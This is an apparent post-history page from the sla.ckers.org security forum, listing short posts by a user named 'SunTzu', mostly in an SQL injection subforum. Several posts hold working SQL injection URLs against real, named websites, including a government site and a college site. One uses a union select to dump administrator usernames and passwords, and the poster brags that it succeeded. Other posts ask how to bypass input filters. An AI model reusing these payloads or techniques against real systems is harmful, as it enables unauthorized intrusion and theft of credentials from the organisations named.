Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Current Page: 1 of 1
Results 1 - 6 of 6
2 years ago
SunTzu
http://www.vlada.hr/design/vlada2/dtv/index.php?q=zagreb'+and+1=1+/*!uNioN*/+select+all+1,2,3,4,5,6,7+--+ can't bypass it -.-' any ideas?
Forum: SQL and Code Injection
2 years ago
SunTzu
2. alo.rs
hi guys. i could use a bit of help with this. does anyone have any ideas on how to bypass this php custom filter? http://www.alo.rs/resources/templates/tools/print.php?id=45356
Forum: SQL and Code Injection
2 years ago
SunTzu
man good job on the tool. it helped a lot.
Forum: Projects
2 years ago
SunTzu
did you try bypassing with php.ini ?
Forum: Full Disclosure
2 years ago
SunTzu
http://www.kupindo.com/pretraga.php?Pretraga=&fv=99&Grupa=322'
Forum: SQL and Code Injection
2 years ago
SunTzu
Hi, i am a little drunk right now. but i managed to do this injection hell ya. So from my experience there is always another file on the CMS that's vulnerable so i didn't do a sqli on the one u gave. http://www.cgc.edu.in/photoserve.php?thumb=-478+and+1=1+union+select+all+1,2,3,group_concat(USERNAME,char(58),APASSWORD)+from+adminusr http://www.cgc.edu.in/photoserve.php?thumb=-478+and+1=1+un
Forum: SQL and Code Injection
Current Page: 1 of 1